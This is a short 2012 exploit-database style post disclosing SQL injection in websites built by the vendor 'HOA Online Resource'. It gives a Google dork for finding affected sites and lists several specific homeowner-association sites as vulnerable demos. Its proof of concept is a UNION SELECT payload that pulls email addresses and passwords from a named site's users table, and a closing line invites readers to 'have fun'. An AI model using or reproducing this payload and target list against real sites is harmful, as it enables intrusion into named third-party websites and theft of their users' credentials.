HOA Online Resource - SQL Injection Vulnerability



EKU-ID: 2077 CVE: OSVDB-ID:
Author: D0m12 Published: 2012-05-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


==========================================================================
<<<:>>>   HOA Online Resource - SQL Injection Vulnerability          <<:>>>
==========================================================================
Title: HOA Online Resource - SQL Injection Vulnerability
Author : D0m12
Date: 06/05/2012
Google Dork--> intext:"Website Design by HOA Online Resource" inurl:.php?id=
Vendor Link: http://www.hoaonlineresource.com/
Tested On: Win 7
Contact : d0m1265@yahoo.com
[+]Demos
http://co4bigred.com/news.php?id=8'
http://www.seabridgeowners.com/article.php?id=110'
http://www.kingslandglenhoa.com/news.php?id=2'
MANY MORE @ Google

Note: In some websites you might not see the mysql error message but it is vulnerable.You will notice that part of page won't load
Proof of Concept:
http://www.kingslandglenhoa.com/news.php?id=-2+UnIon+seleCt+1,2,3,GrOUp_COnCaT(emailaddr,0x3a,pw),5,6+from+hoaonlin_kingslandglenhoa.users--


Have Fun Guys :D
Hope they fix their shit soon :)
#########################################################################
Greetz To :
All My Friends From ABH & to All those who know me:)
#########################################################################